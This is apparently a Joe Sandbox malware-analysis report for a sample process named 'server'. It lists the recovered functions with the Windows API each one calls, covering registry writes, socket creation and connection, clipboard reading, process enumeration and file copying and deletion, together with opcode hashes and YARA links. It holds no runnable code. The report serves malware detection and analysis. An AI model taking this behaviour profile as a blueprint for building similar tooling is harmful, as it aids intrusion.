API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: 48e05a87e364f43dadbc994194953d4fb59c5ec17354886c83054860460e7e58
Instruction ID: 3d417dbd0388dd9345d1777bba6021ee91112b7b1c7fbd2c38722ddd5af916e7
Opcode Fuzzy Hash: 48e05a87e364f43dadbc994194953d4fb59c5ec17354886c83054860460e7e58
Instruction Fuzzy Hash: 97318E72504384AFE721CF65DC45FA6BFBCEF05224F08849AE948DB662D364A909CB71

Function 00D9AF76 Relevance: 1.6, APIs: 1, Instructions: 89synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNELBASE(?,?), ref: 00D9B01D

Memory Dump Source

Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d9a000_server.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: f51b90e6e4ce46859fc22d4fac2329ed5289f83c52c7ae5244ed61327510e0d2
Instruction ID: 61a3efd7cb3a2f6e3c6303a16004fbbbde3ef45ddc1206e5d5bcb6597bc69eac
Opcode Fuzzy Hash: f51b90e6e4ce46859fc22d4fac2329ed5289f83c52c7ae5244ed61327510e0d2
Instruction Fuzzy Hash: DD3193715093806FE711CF25DC45F96FFB8EF06314F09849AE988CB2A2D365A909C772

Function 00D9B23D Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E90,DFA40B92,00000000,00000000,00000000,00000000), ref: 00D9B2F8

Memory Dump Source

Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d9a000_server.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: e7e2b06a7062bd080a7288a7185ebc378ca11b8793732cbc7f8ae05896bfc12a
Instruction ID: f59cd90157ef0b1df44ddbe9b64bc8d9237b75f99e6e1bcb85cfa2553be129ea
Opcode Fuzzy Hash: e7e2b06a7062bd080a7288a7185ebc378ca11b8793732cbc7f8ae05896bfc12a
Instruction Fuzzy Hash: D831A1751093846FEB22CF21DC45FA6BFACEF06324F08849AE8458B162D364E908CB71

Function 03AA1A70 Relevance: 1.6, APIs: 1, Instructions: 88timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNELBASE(?,00000E90,DFA40B92,00000000,00000000,00000000,00000000), ref: 03AA1B0D

Memory Dump Source

Source File: 00000004.00000002.4627857239.0000000003AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3aa0000_server.jbxd

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: c14e9dedfd61f968ad8a8e856a25c19e5fdfe2b3e7dd03233d1434ed1fc3ecc3
Instruction ID: fb3ae3bb7d399479eda5b5e7ef2f8c750e5b2c70534659c5c4ff685394440a04
Opcode Fuzzy Hash: c14e9dedfd61f968ad8a8e856a25c19e5fdfe2b3e7dd03233d1434ed1fc3ecc3
Instruction Fuzzy Hash: 4721E3725057806FEB128F20DC45F96BFBCEF06324F0884DAE9859B1A2D325A909C771

Function 03AA1DB4 Relevance: 1.6, APIs: 1, Instructions: 86windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNELBASE(?,00000E90,?,?), ref: 03AA1E66

Memory Dump Source

Source File: 00000004.00000002.4627857239.0000000003AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3aa0000_server.jbxd

Similarity

API ID: FormatMessage
String ID:
API String ID: 1306739567-0
Opcode ID: d5d7bb203b3487c812f8dcd5b737dc1a5322e19343de55b049ee86e1f6b0f431
Instruction ID: bcae6f57b1fa6d77fdd98f88cbf7dec4b07ae0ed033655afb98c726b95f7e50d
Opcode Fuzzy Hash: d5d7bb203b3487c812f8dcd5b737dc1a5322e19343de55b049ee86e1f6b0f431
Instruction Fuzzy Hash: 01318E7150E3C06FD7038B258C51B66BFB8EF47610F0A84DBD8849F6A3D624691AC7B2

Function 00D9A6CE Relevance: 1.6, APIs: 1, Instructions: 85comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?,00000E90,?,?), ref: 00D9A77E

Memory Dump Source

Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d9a000_server.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 66685493705274ba58766b11276eb2db8969e2b30bffc248e7a5921739136f68
Instruction ID: fe9e9f6d81b06ba1609ec7aec3293dd850c621d2a7bd4158ca46451703eda798
Opcode Fuzzy Hash: 66685493705274ba58766b11276eb2db8969e2b30bffc248e7a5921739136f68
Instruction Fuzzy Hash: 4B31827114D3C06FD3138B259C61B61BFB4EF47614F0A80DBD884CB5A3D2696819D772

Function 00D9B42C Relevance: 1.6, APIs: 1, Instructions: 82windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutA.USER32(?,00000E90), ref: 00D9B4D5

Memory Dump Source

Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d9a000_server.jbxd

Similarity

API ID: MessageSendTimeout
String ID:
API String ID: 1599653421-0
Opcode ID: 4582031fe6ad5588912154b19b902f735329ae56cef6339b43060b5d2c9994b1
Instruction ID: 33bbfd540b5969aa1a74ec70981b0fa338444c74ec9d840c6a93bb0c0eaff59c
Opcode Fuzzy Hash: 4582031fe6ad5588912154b19b902f735329ae56cef6339b43060b5d2c9994b1
Instruction Fuzzy Hash: A021E471104340AFEB228F21DC44FA2FFB8EF06320F08849AF9848B662D375A419DB71

Function 00D9BAC0 Relevance: 1.6, APIs: 1, Instructions: 80COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 00D9BB4E

Memory Dump Source

Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d9a000_server.jbxd

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 60fe04d3f0be4a0f43988ec0cd8795675307e5959298938c6dc7ffa4a8bcb96d
Instruction ID: 65efa11a5c8eb77565381ee5f66fe2ccd5ebeebb7bd31a4752d24a3b81078392
Opcode Fuzzy Hash: 60fe04d3f0be4a0f43988ec0cd8795675307e5959298938c6dc7ffa4a8bcb96d
Instruction Fuzzy Hash: 2C216B725093C09FDB128B65DC55B92BFB8AF13324F0E84DBD888CB5A3D2249809CB71

Function 03AA0ECE Relevance: 1.6, APIs: 1, Instructions: 77networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 03AA0F5A

Memory Dump Source

Source File: 00000004.00000002.4627857239.0000000003AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3aa0000_server.jbxd

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: 120d311f800b22bc240c9aab28a59afa46121560fd0e10fa6abc69f82c6b781f
Instruction ID: 9bd7333b2106c3e484fff0702b4b4487065adabf8e5bb5a341aeeae366af4b5d
Opcode Fuzzy Hash: 120d311f800b22bc240c9aab28a59afa46121560fd0e10fa6abc69f82c6b781f
Instruction Fuzzy Hash: 4921A071409780AFE721CF55CC45F96FFB8EF05220F08889EE9858B662D375A418CB72

Function 03AA1522 Relevance: 1.6, APIs: 1, Instructions: 77fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNELBASE ref: 03AA15B6

Memory Dump Source

Source File: 00000004.00000002.4627857239.0000000003AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3aa0000_server.jbxd

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 76445e7237a4c866d4239c1ea10b7f1641aa12d14b66764a7f1f5aab54ecbf9e
Instruction ID: 16324f881f577dac74f933ef7acbcf51103b6f7608b6fd82560eb83fda2820ab
Opcode Fuzzy Hash: 76445e7237a4c866d4239c1ea10b7f1641aa12d14b66764a7f1f5aab54ecbf9e
Instruction Fuzzy Hash: 8021A271504380AFE721CF15CC44F96FFBCEF05214F08849EE9858B652D365A508C772

Function 00D9B34E Relevance: 1.6, APIs: 1, Instructions: 77registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.KERNELBASE(?,00000E90,DFA40B92,00000000,00000000,00000000,00000000), ref: 00D9B3E4

Memory Dump Source

Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d9a000_server.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 907ca42fec1a8eaf5b6217b0285449840057fc6bc92f56d8b1b0af605fd6dae0
Instruction ID: 30a0c9a27945be06110aeff71dd4553ae8f7b02e5781d34821a052a092e5facc
Opcode Fuzzy Hash: 907ca42fec1a8eaf5b6217b0285449840057fc6bc92f56d8b1b0af605fd6dae0
Instruction Fuzzy Hash: 942181725043806FDB228F11DC45FA7BFBCEF45324F08849AE9858B662D364E808C771

Function 03AA1392 Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000E90), ref: 03AA1403

Memory Dump Source

Source File: 00000004.00000002.4627857239.0000000003AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3aa0000_server.jbxd

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: 8e88f09a86c6d36e285937b812baba05b1865e706a33c54b67b5b26c110a3d0b
Instruction ID: 24b8f9ee75929c88116a01eeb8f8fef82fce9964ee1a8b810eacecb447bf909b
Opcode Fuzzy Hash: 8e88f09a86c6d36e285937b812baba05b1865e706a33c54b67b5b26c110a3d0b
Instruction Fuzzy Hash: 0B21D472500704AFEB20CF29DC45FAAFBACEF00324F08846AE949DB651D364E409CBB1

Function 03AA127A Relevance: 1.6, APIs: 1, Instructions: 76registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E90,DFA40B92,00000000,00000000,00000000,00000000), ref: 03AA1318

Memory Dump Source

Source File: 00000004.00000002.4627857239.0000000003AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3aa0000_server.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 75e194b305bac682bb0451010c56a9ca8c9708aa31fca1df10dd5264eacf198c
Instruction ID: d8b0be222e47758c8e29b0ef8102854c62ccf239f8fd972052f23ba1f24d6504
Opcode Fuzzy Hash: 75e194b305bac682bb0451010c56a9ca8c9708aa31fca1df10dd5264eacf198c
Instruction Fuzzy Hash: DC219C72504780AFE722CF15CC44F67FFBCAF45210F08849AE9858B6A2D365E808CB71

Function 00D9AAA6 Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 00D9AB25

Memory Dump Source

Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d9a000_server.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c0f9167ac47a34ab95f9420c6e1170ffc66cc6ac0d4de8503cdabef8f4baeab7
Instruction ID: e68c0a53462f36573ae1df91cfb9dddbf4f61afde79f348eb375a6c344e7fca9
Opcode Fuzzy Hash: c0f9167ac47a34ab95f9420c6e1170ffc66cc6ac0d4de8503cdabef8f4baeab7
Instruction Fuzzy Hash: 08219276600240AFEB21CF65CC85F66FBE8EF04324F088959E9458B651D775E408DBB2

Function 00D9B176 Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,00000E90), ref: 00D9B1F5

Memory Dump Source

Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d9a000_server.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: eb86c8aa6a78c0e2a4db960dd24dfd1a38040fbc35339c2492047b051c78a788
Instruction ID: 8fc8716c230db7882d8ea2cf6babb10a4d0f70db026a67b209990ff5c65bfe93
Opcode Fuzzy Hash: eb86c8aa6a78c0e2a4db960dd24dfd1a38040fbc35339c2492047b051c78a788
Instruction Fuzzy Hash: FD21C072500304AEEB21DF51DC85FABFBACEF04724F08855AE945DB652D374E508CAB6

Function 03AA1F77 Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

GetProcessWorkingSetSize.KERNEL32(?,00000E90,DFA40B92,00000000,00000000,00000000,00000000), ref: 03AA1FF3

Memory Dump Source

Source File: 00000004.00000002.4627857239.0000000003AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3aa0000_server.jbxd

Similarity

API ID: ProcessSizeWorking
String ID:
API String ID: 3584180929-0
Opcode ID: f58e73fa6caf6807360683517fcf5e0cb41be12797d2c24a96b0b7cb4366f4d8
Instruction ID: e8b2da63131079517d1df6b3d89c9809e528c4b1cfc68db3426e314d97f103c1
Opcode Fuzzy Hash: f58e73fa6caf6807360683517fcf5e0cb41be12797d2c24a96b0b7cb4366f4d8
Instruction Fuzzy Hash: 0721C2725057806FEB21CF25CC45F97BFACEF05214F08849BE944DB152D364A908CB76

Function 03AA205B Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetProcessWorkingSetSize.KERNEL32(?,00000E90,DFA40B92,00000000,00000000,00000000,00000000), ref: 03AA20D7

Memory Dump Source

Source File: 00000004.00000002.4627857239.0000000003AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3aa0000_server.jbxd

Similarity

API ID: ProcessSizeWorking
String ID:
API String ID: 3584180929-0
Opcode ID: f58e73fa6caf6807360683517fcf5e0cb41be12797d2c24a96b0b7cb4366f4d8
Instruction ID: 3da4e0ceb18fb1b95ce4713d947b7b42ff798415473001dbab9c069db231491e
Opcode Fuzzy Hash: f58e73fa6caf6807360683517fcf5e0cb41be12797d2c24a96b0b7cb4366f4d8
Instruction Fuzzy Hash: 2821C2725043806FEB12CF15CC45FA6BFACEF05214F0884ABE944DB152D374A508CB76

Function 00D9ADCE Relevance: 1.6, APIs: 1, Instructions: 73fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,00000E90,DFA40B92,00000000,00000000,00000000,00000000), ref: 00D9AE4D

Memory Dump Source

Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d9a000_server.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: f9127c3fa18ad7e8d3c7b7d6e1969573400872f5a8360c9a9a265257d132482c
Instruction ID: 720b5c0af045fb70c05456cc8237ddf1d5a0f216189924ae0060be2eb4e0be03
Opcode Fuzzy Hash: f9127c3fa18ad7e8d3c7b7d6e1969573400872f5a8360c9a9a265257d132482c
Instruction Fuzzy Hash: EF21F672504340AFEB22CF51DC44FA7BFACEF45314F08849AF9449B552D275A908C7B2

Function 00D9AC37 Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E90,DFA40B92,00000000,00000000,00000000,00000000), ref: 00D9ACBD

Memory Dump Source

Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d9a000_server.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 8b113c963368c93c9481962687a8295649ccb49b3ba9e2ad1e2aacba7bb1fc20
Instruction ID: 07d1e070894ad8600ecf30aae06f8632d3a0a1494ecbbef52680e351002bc1b2
Opcode Fuzzy Hash: 8b113c963368c93c9481962687a8295649ccb49b3ba9e2ad1e2aacba7bb1fc20
Instruction Fuzzy Hash: DD21D8B65083806FE7128B11DC40BA2BFBCEF42314F0880D6E9848F253D264A909D772

Function 03AA1E9C Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

GetExitCodeProcess.KERNELBASE(?,00000E90,DFA40B92,00000000,00000000,00000000,00000000), ref: 03AA1F14

Memory Dump Source

Source File: 00000004.00000002.4627857239.0000000003AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3aa0000_server.jbxd

Similarity

API ID: CodeExitProcess
String ID:
API String ID: 3861947596-0
Opcode ID: d730848597b3141f0bb856a08fbc0e9895f705ec93b5283f53211a8eb535c5b8
Instruction ID: d7071c02edd3894a212d4ecbbbb96bc78ac2db4c47a8dc6387a079169fcb4f88
Opcode Fuzzy Hash: d730848597b3141f0bb856a08fbc0e9895f705ec93b5283f53211a8eb535c5b8
Instruction Fuzzy Hash: 7021A1725053806FEB11CB15DC45F96BFACEF41224F08849BE948DB692D364A908C771

Function 00D9AFAA Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNELBASE(?,?), ref: 00D9B01D

Memory Dump Source

Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d9a000_server.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 390d3271954ce4016e4803624af557a4dac9e94e7d0535b350c7b5e6701512c0
Instruction ID: bba95c7025c305030388259a66a6a8d1f37516e88df19438dc741d1f3e809d1b
Opcode Fuzzy Hash: 390d3271954ce4016e4803624af557a4dac9e94e7d0535b350c7b5e6701512c0
Instruction Fuzzy Hash: 40218071600240AFEB20CF25DD85FA6FBE8EF05324F08846AE9498B651D775E909CA72

Function 00D9A9BF Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 00D9AA44

Memory Dump Source

Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d9a000_server.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 4135dbb613d8483493fb5344745faa466c3d95fe4789ad6ecd30eab2e159cee2
Instruction ID: 0f666f9fd7a0e8ee1febd1ed0920940ad8e13d132f424be5f96f5b1792a6b39c
Opcode Fuzzy Hash: 4135dbb613d8483493fb5344745faa466c3d95fe4789ad6ecd30eab2e159cee2
Instruction Fuzzy Hash: 2F21396540E3C0AFDB138B25DC55A51BF74EF53624F0E81DBD9848F5A3C2695809CB72

Function 00D9B27E Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E90,DFA40B92,00000000,00000000,00000000,00000000), ref: 00D9B2F8

Memory Dump Source

Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d9a000_server.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: e3599374560064402acf9cdc2ba99c545f4485f875dc5915a6c7e9e7f62a0913
Instruction ID: 10e7b2f8123a1ea895b7d757dcfe8ab6a09d04d5b6499e24cd916627bfa478d6
Opcode Fuzzy Hash: e3599374560064402acf9cdc2ba99c545f4485f875dc5915a6c7e9e7f62a0913
Instruction Fuzzy Hash: F8219075600204AFEB21CF15DD85FA7F7ECEF04724F08855AE945CB651D764E808CA75

Function 00D9B719 Relevance: 1.6, APIs: 1, Instructions: 69fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNELBASE(?,?,?), ref: 00D9B78E

Memory Dump Source

Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d9a000_server.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 49f9977e26d6828e24b1abd898378cc788b730166bd3b8bc018b7dfa4fd462f4
Instruction ID: f157ebbfbf3b58192ac17be3e6726143eb9e035b519a1e401773d85ac2e844d3
Opcode Fuzzy Hash: 49f9977e26d6828e24b1abd898378cc788b730166bd3b8bc018b7dfa4fd462f4
Instruction Fuzzy Hash: 3B218171505380AFEB22CF65DC54B62BFA8EF46720F0885DAED85CB252D265E808D771

Function 03AA1C4B Relevance: 1.6, APIs: 1, Instructions: 68networkCOMMON

Download Yara Rule

APIs

WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 03AA1CCA

Memory Dump Source

Source File: 00000004.00000002.4627857239.0000000003AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3aa0000_server.jbxd

Similarity

API ID: Connect
String ID:
API String ID: 3144859779-0
Opcode ID: 7e79e9472884ba6a3aa10e40d17d237487f86bc1b1bdad179df336e7ed7c8488
Instruction ID: aa80a36faa5192a254423b955cebfa440c13a6654c0e220fe2a5a917f78c99d0
Opcode Fuzzy Hash: 7e79e9472884ba6a3aa10e40d17d237487f86bc1b1bdad179df336e7ed7c8488
Instruction Fuzzy Hash: 0521BE76409780AFDB22CF65CC84B92BFF4EF06310F0985DAE9858F162D375A809DB61

Function 00D9B897 Relevance: 1.6, APIs: 1, Instructions: 68fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?), ref: 00D9B908

Memory Dump Source

Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d9a000_server.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: a934c69f277bb1e4ad8a6966373a62cc95fad88d79ce2e7dd7a12f7ad1590ed7
Instruction ID: d373f8dbb42baaba97c5b3424c247c5ca270b64ab6fc4f3f761e65f769495a0c
Opcode Fuzzy Hash: a934c69f277bb1e4ad8a6966373a62cc95fad88d79ce2e7dd7a12f7ad1590ed7
Instruction Fuzzy Hash: 3A2181B65093805FDB12CB25DC45B52BFB8EF06324F0984DBED85CF163D2659908CB61

Function 03AA0EEE Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 03AA0F5A

Memory Dump Source

Source File: 00000004.00000002.4627857239.0000000003AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3aa0000_server.jbxd

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: 3a5ca6c38b48f272bdcd8a9c5b288278e7d31743a1a4f14620c35d0ca28d3665
Instruction ID: e802ae97f710bdd93a50097ecc7cd28a8909378394381d673a906c450da5fa87
Opcode Fuzzy Hash: 3a5ca6c38b48f272bdcd8a9c5b288278e7d31743a1a4f14620c35d0ca28d3665
Instruction Fuzzy Hash: 95210172500600AFEB21CF55CC41F96FBA8EF08324F08889EE9858B661D376A419CB72

Function 03AA1542 Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNELBASE ref: 03AA15B6

Memory Dump Source

Source File: 00000004.00000002.4627857239.0000000003AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3aa0000_server.jbxd

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: 0a26a56f143b88d6e5f0be05b58c6918caefa98eb3e677ccc1bed83001df35b9
Instruction ID: 22843112485f567ee02197e9d34d60cf21a1570a215c032e4d8db20e665b261c
Opcode Fuzzy Hash: 0a26a56f143b88d6e5f0be05b58c6918caefa98eb3e677ccc1bed83001df35b9
Instruction Fuzzy Hash: DD219F76500640AFEB21CF15CC85F96FBECEF08224F04859AE9468B751E775E509CBB2

Function 00D9BDD1 Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

K32EnumProcesses.KERNEL32(?,?,?,DFA40B92,00000000,?,?,?,?,?,?,?,?,6CD53C58), ref: 00D9BE42

Memory Dump Source

Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d9a000_server.jbxd

Similarity

API ID: EnumProcesses
String ID:
API String ID: 84517404-0
Opcode ID: c53b5fd6c2635c1ccf0c934f95b544016186a6fc86910d65f7cba11c8e9f9028
Instruction ID: 32a8f25ba820bf641445cacc783b8655f5aee93ad60be08ffa18564a32fac286
Opcode Fuzzy Hash: c53b5fd6c2635c1ccf0c934f95b544016186a6fc86910d65f7cba11c8e9f9028
Instruction Fuzzy Hash: 672150715093809FDB12CF25DC85B92BFB8EF06320F0984EAE985CB163D225A908CB61

Function 00D9B45A Relevance: 1.6, APIs: 1, Instructions: 66windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutA.USER32(?,00000E90), ref: 00D9B4D5

Memory Dump Source

Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d9a000_server.jbxd

Similarity

API ID: MessageSendTimeout
String ID:
API String ID: 1599653421-0
Opcode ID: d2cc9d1f876e55167e567e5ccf0ee1473b22e03d75e4625d43ac4dee0c8020f6
Instruction ID: bfcba5530d80b8cbd152228c37b492723e63cf8bb9bdb8abca218314cc4a9672
Opcode Fuzzy Hash: d2cc9d1f876e55167e567e5ccf0ee1473b22e03d75e4625d43ac4dee0c8020f6
Instruction Fuzzy Hash: 6221E172500200AFEB318F11DC41FA6FBA8EF04724F18885AFE859B661D375E519DBB2

Function 03AA12A6 Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E90,DFA40B92,00000000,00000000,00000000,00000000), ref: 03AA1318

Memory Dump Source

Source File: 00000004.00000002.4627857239.0000000003AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3aa0000_server.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: baab47cd19a4a22d4430d6171b77a9d5e6ef00cd2f3e30a1fc166a62dea08c2d
Instruction ID: a74f85af49f283ca08c241f1735a246fc81d1355c9c24be234ed500b2e1d8f66
Opcode Fuzzy Hash: baab47cd19a4a22d4430d6171b77a9d5e6ef00cd2f3e30a1fc166a62dea08c2d
Instruction Fuzzy Hash: CF118E76600704AFEB21CF15DC85FA6FBECEF04714F08846AE945CBA61D764E408CAB6

Function 00D9B94F Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,?), ref: 00D9B9BF

Memory Dump Source

Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d9a000_server.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 65fc7d9fc69f0134cb35645ca98786e2b82addc164fe1d5d5b78da03d135d871
Instruction ID: e6ee3f7d277f0c54cad29b749438a016d8fdc3380679eed1fc74fd25059e5a1d
Opcode Fuzzy Hash: 65fc7d9fc69f0134cb35645ca98786e2b82addc164fe1d5d5b78da03d135d871
Instruction Fuzzy Hash: EA2193715093809FDB128F25DC85B56BFA8EF02320F0984DBD985CF263D2659909CB71

Function 00D9B372 Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

